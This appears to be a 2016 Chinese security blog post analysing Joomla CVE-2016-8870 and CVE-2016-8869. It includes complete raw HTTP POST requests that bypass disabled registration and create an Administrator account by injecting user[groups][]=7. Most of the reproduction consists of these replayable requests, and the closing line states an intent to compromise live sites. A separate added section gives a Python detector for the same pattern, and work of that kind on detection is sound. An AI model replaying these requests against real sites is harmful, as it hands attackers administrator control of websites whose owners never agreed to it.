
Analysis of unauthorised privileged-user creation in Joomla (CVE-2016-8870 and CVE-2016-8869)

2016-10-27 09:34:07         Source: Bendawang's Blog

I happened to see a new Joomla vulnerability announced today. It caught my interest, so I took a closer look.

1. Affected versions

Joomla 3.4.4 to 3.6.3

CVE-2016-8870: a user can still be created while the site has registration disabled.

CVE-2016-8869: the created user can be given elevated privileges.

2. Reproduction

2.1 Creating a user with CVE-2016-8870

registration.php and user.php under components/com_users/controllers contain the following code.

First, part of the register() function of the UsersControllerRegistration class in registration.php:

(screenshot of the registration.php code not reproduced)

Then the complete register() function of the UsersControllerUser class in user.php:

public function register()
{
  JSession::checkToken('post') or jexit(JText::_('JINVALID_TOKEN'));

  // Get the application
  $app = JFactory::getApplication();

  // Get the form data.
  $data = $this->input->post->get('user', array(), 'array');

  // Get the model and validate the data.
  $model  = $this->getModel('Registration', 'UsersModel');

  $form = $model->getForm();

  if (!$form)
  {
     JError::raiseError(500, $model->getError());

     return false;
  }

  $return = $model->validate($form, $data);

  // Check for errors.
  if ($return === false)
  {
     // Get the validation messages.
     $errors = $model->getErrors();

     // Push up to three validation messages out to the user.
     for ($i = 0, $n = count($errors); $i < $n && $i < 3; $i++)
     {
        if ($errors[$i] instanceof Exception)
        {
           $app->enqueueMessage($errors[$i]->getMessage(), 'notice');

           continue;
        }

        $app->enqueueMessage($errors[$i], 'notice');
     }

     // Save the data in the session.
     $app->setUserState('users.registration.form.data', $data);

     // Redirect back to the registration form.
     $this->setRedirect('index.php?option=com_users&view=registration');

     return false;
  }

  // Finish the registration.
  $return = $model->register($data);

  // Check for errors.
  if ($return === false)
  {
     // Save the data in the session.
     $app->setUserState('users.registration.form.data', $data);

     // Redirect back to the registration form.
     $message = JText::sprintf('COM_USERS_REGISTRATION_SAVE_FAILED', $model->getError());
     $this->setRedirect('index.php?option=com_users&view=registration', $message, 'error');

     return false;
  }

  // Flush the data from the session.
  $app->setUserState('users.registration.form.data', null);

  return true;
}

The obvious difference is that user.php lacks the block below. It is easy to read: if the site has registration disabled, redirect straight to the login page.

// If registration is disabled - Redirect to login page.
if (JComponentHelper::getParams('com_users')->get('allowUserRegistration') == 0)
{
   $this->setRedirect(JRoute::_('index.php?option=com_users&view=login', false));

   return false;
}

In other words, if we can reach the UsersControllerUser class in user.php, we can register through UsersControllerUser::register() and bypass this check entirely.

Now let's walk through the process. After a fresh Joomla install, registration is disabled by default and the home page shows no registration option.

First enable registration, then register normally and capture the request (ignore the pile of cookies):

POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration
Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 5fdbb0240381dcfb784bf866abf180ba=khak6ckt63vlt7n116ma3ep7v1; 72ade33b26d1725575072c551da17dac=pd1k5dr7aqndmkuckl4f6umni4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------21344283549747877901996448611
Content-Length: 1239

-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[name]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[username]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[password1]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[password2]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[email1]"

Bendawang@bdw.com
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="jform[email2]"

bendawang12138@163.com
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="option"

com_users
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="task"

registration.register
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="9da03819be371b7d0c51983dcf98816f"

1
-----------------------------21344283549747877901996448611--

Registration succeeds.

(screenshot not reproduced)

Looking at the request parameter task=registration.register, we can see that normal registration is dispatched to the UsersControllerRegistration class in registration.php, whereas what we want to reach is UsersControllerUser in user.php.

Now disable registration again in the backend and delete the account that was just registered normally. Following the code logic, we want to call the register() method of the UsersControllerUser class in user.php, so we construct the following request:

POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration
Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 5fdbb0240381dcfb784bf866abf180ba=khak6ckt63vlt7n116ma3ep7v1; 72ade33b26d1725575072c551da17dac=pd1k5dr7aqndmkuckl4f6umni4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------21344283549747877901996448611
Content-Length: 1230

-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[name]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[username]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[password1]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[password2]"

Bendawang
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[email1]"

bendawang12138@163.com
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="user[email2]"

bendawang12138@163.com
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="option"

com_users
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="task"

user.register
-----------------------------21344283549747877901996448611
Content-Disposition: form-data; name="9da03819be371b7d0c51983dcf98816f"

1
-----------------------------21344283549747877901996448611--

That is, replace jform with user in every parameter name of the POST body,

and change the task parameter from registration.register to user.register.

Send it; the screenshot below shows the registration succeeding.

(screenshot not reproduced)

That is all there is to CVE-2016-8870; on its own it only creates an ordinary user.

Next comes the real substance, CVE-2016-8869.

Main goal: privilege escalation!!!

2.2 Escalating privileges with CVE-2016-8869

First, look again at the register() method of the UsersControllerUser class in user.php that we used in the previous section to register via CVE-2016-8870. Near its end is this line:

$return = $model->register($data);

This calls the register() method in components/com_users/models/registration.php. Let's look at that method:

(screenshot of the model's register() method not reproduced)

Only a small part is shown. If we dump $data at this point, we get:

(screenshot of the $data dump not reproduced)

As the dump shows, $data actually carries one more parameter, the groups array, and that array is what decides the account's privileges.

The first value in groups determines the account's privilege level; the group list is:

1:Public

2:Registered

3:Author

4:Editor

5:Publisher

6:Manager

7:Administrator

By default, groups holds 2 (Registered) as its first value at registration time, so we construct the following request directly:

POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/joomla/index.php/component/users/?view=registration
Cookie: Hm_lvt_6b15558d6e6f640af728f65c4a5bf687=1476171578,1476175753; bdshare_firstime=1476879802433; ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5; sYQDUGqqzHsearch_history=asdf%7C2%2Casdf%7C52%2Casdf%7C3%2Casdf%7C1; eeeaf53e25e90a39ff315452d513d988=rn180tb8srhihcgnqpo4avgtt6; 9d4bb4a09f511681369671a08beff228=gonv4bis6b1cu1f0c7mpbr2kt7; 72ade33b26d1725575072c551da17dac=56dhrsu2p3rdefnjfktdhp8dr7; 5fdbb0240381dcfb784bf866abf180ba=vna9ecejm5rof04o1a7umbmo23
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------12126918671528593691690879232
Content-Length: 1350

-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[name]"

Bendawang
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[username]"

Bendawang
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[password1]"

Bendawang
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[password2]"

Bendawang
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[email1]"

bendawang12138@163.com
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[email2]"

bendawang12138@163.com
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="user[groups][]"

7
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="option"

com_users
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="task"

user.register
-----------------------------12126918671528593691690879232
Content-Disposition: form-data; name="ad46184799be6e742bc96a739ac62ffa"

1
-----------------------------12126918671528593691690879232--

We request the Administrator group directly and send the packet; the backend shows the account registered successfully:

(screenshot of the backend user list not reproduced)
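For anyone reviewing captured traffic for this pattern, here is an added detection example (not part of the original post or of Joomla) that parses a multipart registration POST and reports the indicators the two sections above rely on: a task of user.register, user[...] field names in place of jform[...], and a user[groups][] value. The request builder, boundary and group table are constructed from this post's captures and are assumptions of the example.

```python
import re

# Joomla user-group ids as listed in the post, used only to name the group requested.
GROUP_NAMES = {"1": "Public", "2": "Registered", "3": "Author", "4": "Editor",
               "5": "Publisher", "6": "Manager", "7": "Administrator"}
# Constructed boundary (copied from the post's capture); any value works.
BOUNDARY = "---------------------------12126918671528593691690879232"


def build_request(fields):
    """Build a constructed registration POST shaped like the captures in the post."""
    parts = "".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{n}"\r\n\r\n{v}\r\n'
                    for n, v in fields)
    return ("POST /joomla/index.php/component/users/?task=registration.register HTTP/1.1\r\n"
            "Host: 127.0.0.1:8000\r\n"
            f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
            f"{parts}--{BOUNDARY}--\r\n")


def parse_multipart(raw):
    """Return {field name: [values]} from the multipart body of a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    match = re.search(r"boundary=([^\s;]+)", head)
    fields = {}
    if match:
        for part in body.split("--" + match.group(1)):
            part_head, sep, value = part.partition("\r\n\r\n")
            name = re.search(r'name="([^"]*)"', part_head)
            if sep and name:  # skips the leading empty chunk and the closing "--"
                fields.setdefault(name.group(1), []).append(value.rstrip("\r\n"))
    return fields


def check_registration(raw):
    """List the indicators of the CVE-2016-8870/8869 pattern present in a captured POST."""
    fields = parse_multipart(raw)
    # The task can arrive in the query string or as a form field; check both.
    tasks = set(fields.get("task", []))
    tasks.update(re.findall(r"[?&]task=([^&\s]+)", raw.split("\r\n", 1)[0]))
    findings = []
    if "user.register" in tasks:  # dispatches to UsersControllerUser::register (CVE-2016-8870)
        findings.append("task=user.register bypasses the allowUserRegistration check")
    if any(n.startswith("user[") for n in fields):  # the normal form posts jform[...]
        findings.append("form fields are named user[...] instead of jform[...]")
    for gid in fields.get("user[groups][]", []):  # groups injected into $data (CVE-2016-8869)
        findings.append(f"groups requested: {gid} ({GROUP_NAMES.get(gid, 'unknown')})")
    return findings
```

The same checks can be applied at a reverse proxy or WAF in front of com_users; on a patched site a user.register task or a user[groups][] field in a registration POST has no legitimate source.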

That's the reproduction done. Time to go grab a batch of boxes while it lasts...
